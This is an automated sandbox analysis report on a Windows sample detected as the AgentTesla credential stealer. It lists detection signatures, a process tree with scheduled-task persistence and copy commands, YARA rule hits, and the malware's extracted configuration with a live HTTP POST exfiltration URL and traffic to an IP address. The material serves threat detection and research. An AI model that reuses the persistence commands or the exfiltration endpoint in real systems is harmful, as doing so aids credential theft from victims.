
Windows Analysis Report
pdP5Rv9pPW.exe

Overview

General Information

Sample Name: pdP5Rv9pPW.exe
Analysis ID: 691823
MD5: 18e913ec810a1131c23d6fea7526c4f8
SHA1: 96c426169c87505e950898ad38913cc726bf198d
SHA256: 548a9d790d8d54baf1faf9c67133398a96fad5add7daa35e89aad9d777bd103d
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Injects files into Windows application
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Binary or sample is protected by dotNetProtector
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
PE file contains executable resources (Code or Archives)
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • pdP5Rv9pPW.exe (PID: 5704 cmdline: "C:\Users\user\Desktop\pdP5Rv9pPW.exe" MD5: 18E913EC810A1131C23D6FEA7526C4F8)
    • vbc.exe (PID: 5224 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
    • cmd.exe (PID: 5020 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5076 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 6128 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 4980 cmdline: cmd" /c copy "C:\Users\user\Desktop\pdP5Rv9pPW.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • excel.exe (PID: 3980 cmdline: "C:\Users\user\AppData\Roaming\excel\excel.exe" MD5: B3A917344F5610BEEC562556F11300FA)
    • conhost.exe (PID: 3372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • excel.exe (PID: 992 cmdline: "C:\Users\user\AppData\Roaming\excel\excel.exe" MD5: B3A917344F5610BEEC562556F11300FA)
    • conhost.exe (PID: 5728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • fghn.exe (PID: 5836 cmdline: C:\Users\user\AppData\Roaming\fghn\fghn.exe MD5: 18E913EC810A1131C23D6FEA7526C4F8)
    • vbc.exe (PID: 1608 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe MD5: B3A917344F5610BEEC562556F11300FA)
    • cmd.exe (PID: 5436 cmdline: cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 3372 cmdline: "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • schtasks.exe (PID: 5332 cmdline: schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f MD5: 15FF7D8324231381BAD48A052F85DF04)
    • cmd.exe (PID: 4888 cmdline: cmd" /c copy "C:\Users\user\AppData\Roaming\fghn\fghn.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware configuration (AgentTesla): {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://141.98.6.75/weption/inc/0986372054b5f8.php"}
Source | Rule | Description | Author | Strings
00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_AgentTesla_d3ac2b2f | unknown | unknown
      • 0x30055:$a13: get_DnsResolver
      • 0x2e849:$a20: get_LastAccessed
      • 0x309e9:$a27: set_InternalServerPort
      • 0x30d02:$a30: set_GuidMasterKey
      • 0x2e950:$a33: get_Clipboard
      • 0x2e95e:$a34: get_Keyboard
      • 0x2fc88:$a35: get_ShiftKeyDown
      • 0x2fc99:$a36: get_AltKeyDown
      • 0x2e96b:$a37: get_Password
      • 0x2f40a:$a38: get_PasswordHash
      • 0x3046b:$a39: get_DefaultCredentials
00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security

Source | Rule | Description | Author | Strings
0.2.pdP5Rv9pPW.exe.3996170.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
2.0.vbc.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
2.0.vbc.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.pdP5Rv9pPW.exe.3996170.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
2.0.vbc.exe.400000.0.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen
                  • 0x32b1b:$s10: logins
                  • 0x32582:$s11: credential
                  • 0x2eb50:$g1: get_Clipboard
                  • 0x2eb5e:$g2: get_Keyboard
                  • 0x2eb6b:$g3: get_Password
                  • 0x2fe78:$g4: get_CtrlKeyDown
                  • 0x2fe88:$g5: get_ShiftKeyDown
                  • 0x2fe99:$g6: get_AltKeyDown
No Sigma rule has matched

Snort IDS alerts:
Timestamp: 08/28/22-17:19:41.645966 | Source IP: 192.168.2.4 | Destination IP: 141.98.6.75 | Source Port: 49717 | Destination Port: 80 | Protocol: TCP | SID: 2034579 | Classtype: A Network Trojan was detected
Timestamp: 08/28/22-17:21:11.426704 | Source IP: 192.168.2.4 | Destination IP: 141.98.6.75 | Source Port: 49753 | Destination Port: 80 | Protocol: TCP | SID: 2034579 | Classtype: A Network Trojan was detected


AV Detection

Source: pdP5Rv9pPW.exe | Virustotal: Detection: 66%
Source: pdP5Rv9pPW.exe | ReversingLabs: Detection: 51%
Source: http://141.98.6.75/weption/inc/0986372054b5f8.php | Avira URL Cloud: Label: phishing
Source: http://141.98.6.75 | Virustotal: Detection: 5%
Source: http://141.98.6.75/weption/inc/0986372054b5f8.php | Virustotal: Detection: 11%
Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | ReversingLabs: Detection: 51%
Source: pdP5Rv9pPW.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Joe Sandbox ML: detected
Source: 2.0.vbc.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://141.98.6.75/weption/inc/0986372054b5f8.php"}
Source: pdP5Rv9pPW.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: pdP5Rv9pPW.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: vbc.pdb | source: vbc.exe, 00000002.00000003.370543337.000000000A09D000.00000004.00000800.00020000.00000000.sdmp, excel.exe, 0000000C.00000000.391226032.0000000001261000.00000020.00000001.01000000.00000007.sdmp, excel.exe.2.dr

Software Vulnerabilities

Source: C:\Users\user\AppData\Roaming\excel\excel.exe | Process created: C:\Windows\System32\conhost.exe

Networking

Source: Traffic | Snort IDS: 2034579 ET TROJAN AgentTesla Communicating with CnC Server 192.168.2.4:49717 -> 141.98.6.75:80
Source: Traffic | Snort IDS: 2034579 ET TROJAN AgentTesla Communicating with CnC Server 192.168.2.4:49753 -> 141.98.6.75:80
Source: Joe Sandbox View | ASN Name: CMCSUS CMCSUS
Source: global traffic | HTTP traffic detected: POST /weption/inc/0986372054b5f8.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 | Content-Type: application/x-www-form-urlencoded | Host: 141.98.6.75 | Content-Length: 580 | Expect: 100-continue | Connection: Keep-Alive
Source: unknown | TCP traffic detected without corresponding DNS query: 141.98.6.75 (13 occurrences)
Source: vbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://141.98.6.75
Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://141.98.6.75/weption/inc/0986372054b5f8.php
Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://141.98.6.75/weption/inc/0986372054b5f8.php127.0.0.1POST
Source: vbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://141.98.6.75/weption/inc/0986372054b5f8.phpa
Source: vbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://141.98.6.75/weption/inc/0986372054b5f8.phpa(
Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://141.98.6.754
Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: vbc.exe, 00000017.00000002.590068919.00000000075B6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://X7rzdy8x3IrJP.net
Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ZWXWPK.com
Source: excel.exe, 0000000C.00000002.397005792.00000000006FA000.00000004.00000010.00020000.00000000.sdmp, excel.exe, 00000010.00000002.413724237.00000000004FA000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft
Source: vbc.exe, 00000002.00000002.541792222.0000000006E02000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.589800021.0000000007571000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org%
Source: vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.ipify.org%appdata
Source: vbc.exe, 00000017.00000002.583884404.000000000552A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://di.98.6.75/weption/inc/0986372054b5f8.php
Source: vbc.exe, 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | HTTP traffic detected: POST /weption/inc/0986372054b5f8.php HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0 | Content-Type: application/x-www-form-urlencoded | Host: 141.98.6.75 | Content-Length: 580 | Expect: 100-continue | Connection: Keep-Alive

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Window created: window name: CLIPBRDWNDCLASS

System Summary

Source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: pdP5Rv9pPW.exe PID: 5704, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
Source: 2.0.vbc.exe.400000.0.unpack, <PrivateImplementationDetails>{347C8262-2EBE-4E96-94BF-A26D5CC8C515}/8F8FDB3B-6BBB-4200-AC0A-6D05451697D6.cs | Large array initialization: .cctor: array initializer size 11651
Source: pdP5Rv9pPW.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Matched rule: MALWARE_Win_AgentTeslaV3 (author = ditekSHen, description = AgentTeslaV3 infostealer payload), type: UNPACKEDPE, in sources: 2.0.vbc.exe.400000.0.unpack; 0.2.pdP5Rv9pPW.exe.3996170.1.unpack; 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack; 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack; 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack
Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f (reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20), in sources: type UNPACKEDPE: 2.0.vbc.exe.400000.0.unpack; 0.2.pdP5Rv9pPW.exe.3996170.1.unpack; 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack; 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack; 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack; type MEMORY: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp; 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp; type MEMORYSTR: Process Memory Space: pdP5Rv9pPW.exe PID: 5704; Process Memory Space: vbc.exe PID: 5224
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: String function: 09EE5A68 appears 54 times
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exeCode function: 0_2_00D5F968 CreateProcessAsUserA,0_2_00D5F968
                  Source: excel.exe.2.drStatic PE information: Resource name: RT_STRING type: VAX-order2 68k Blit mpx/mux executable
                  Source: pdP5Rv9pPW.exe, 00000000.00000002.375077653.00000000029E3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerattSBVyJzEUoMgBuAZJkkSZn.exe4 vs pdP5Rv9pPW.exe
                  Source: pdP5Rv9pPW.exe, 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerattSBVyJzEUoMgBuAZJkkSZn.exe4 vs pdP5Rv9pPW.exe
                  Source: pdP5Rv9pPW.exe, 00000000.00000000.301105429.0000000000206000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAvLaunch.exeB vs pdP5Rv9pPW.exe
                  Source: pdP5Rv9pPW.exeBinary or memory string: OriginalFilenameAvLaunch.exeB vs pdP5Rv9pPW.exe
                  Source: pdP5Rv9pPW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: pdP5Rv9pPW.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: fghn.exe.9.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Roaming\excel\excel.exe 7BA4838E3356B69254730E891ADD84092E3143016A515FF3E990CE19874A2459
                  Source: pdP5Rv9pPW.exe | Virustotal: Detection: 66%
                  Source: pdP5Rv9pPW.exe | ReversingLabs: Detection: 51%
                  Source: pdP5Rv9pPW.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknown | Process created: C:\Users\user\Desktop\pdP5Rv9pPW.exe "C:\Users\user\Desktop\pdP5Rv9pPW.exe"
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\pdP5Rv9pPW.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown | Process created: C:\Users\user\AppData\Roaming\excel\excel.exe "C:\Users\user\AppData\Roaming\excel\excel.exe"
                  Source: C:\Users\user\AppData\Roaming\excel\excel.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown | Process created: C:\Users\user\AppData\Roaming\excel\excel.exe "C:\Users\user\AppData\Roaming\excel\excel.exe"
                  Source: C:\Users\user\AppData\Roaming\excel\excel.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknown | Process created: C:\Users\user\AppData\Roaming\fghn\fghn.exe C:\Users\user\AppData\Roaming\fghn\fghn.exe
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fghn\fghn.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe
                  Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | File created: C:\Users\user\AppData\Roaming\fghn
                  Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@32/7@0/1
                  Source: pdP5Rv9pPW.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: pdP5Rv9pPW.exe, CreateHotPool.cs | Base64 encoded string: 'WZFhk50pW2OmZMWUOXwyMIduqTzJ60jPf2OsMwDeSGiC8LAV526YSKogU3aWvSie', 'YpFiMiC/kO9OcRkhNu6mC3n7Tdj750lKg7rA03kDpOM8A/lQE/Lv6Tfa6vefiTJj', 'xQcAAg+NYlRePvn9hmGJQ/DJSUj2NfX6+RI2T6hRX1Fk/a1ZdHvNqYYMEzl0Q5Fc', 'ibJCET1aVlN6DNm3K1QoK3YzyicPwpY8J2bt15NavCwqW2lcNLBBWFSShhKGsLx2', '+RakZT8HDwTrKIp7uBHT74ESxoVRAPoz4js3DLbj8FnHGWMpzo5n8JN8bI6wACVR'
                  Source: 0.0.pdP5Rv9pPW.exe.190000.0.unpack, CreateHotPool.cs | Base64 encoded string: 'WZFhk50pW2OmZMWUOXwyMIduqTzJ60jPf2OsMwDeSGiC8LAV526YSKogU3aWvSie', 'YpFiMiC/kO9OcRkhNu6mC3n7Tdj750lKg7rA03kDpOM8A/lQE/Lv6Tfa6vefiTJj', 'xQcAAg+NYlRePvn9hmGJQ/DJSUj2NfX6+RI2T6hRX1Fk/a1ZdHvNqYYMEzl0Q5Fc', 'ibJCET1aVlN6DNm3K1QoK3YzyicPwpY8J2bt15NavCwqW2lcNLBBWFSShhKGsLx2', '+RakZT8HDwTrKIp7uBHT74ESxoVRAPoz4js3DLbj8FnHGWMpzo5n8JN8bI6wACVR'
                  Source: fghn.exe.9.dr, CreateHotPool.cs | Base64 encoded string: 'WZFhk50pW2OmZMWUOXwyMIduqTzJ60jPf2OsMwDeSGiC8LAV526YSKogU3aWvSie', 'YpFiMiC/kO9OcRkhNu6mC3n7Tdj750lKg7rA03kDpOM8A/lQE/Lv6Tfa6vefiTJj', 'xQcAAg+NYlRePvn9hmGJQ/DJSUj2NfX6+RI2T6hRX1Fk/a1ZdHvNqYYMEzl0Q5Fc', 'ibJCET1aVlN6DNm3K1QoK3YzyicPwpY8J2bt15NavCwqW2lcNLBBWFSShhKGsLx2', '+RakZT8HDwTrKIp7uBHT74ESxoVRAPoz4js3DLbj8FnHGWMpzo5n8JN8bI6wACVR'
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_01
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5728:120:WilError_01
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3524:120:WilError_01
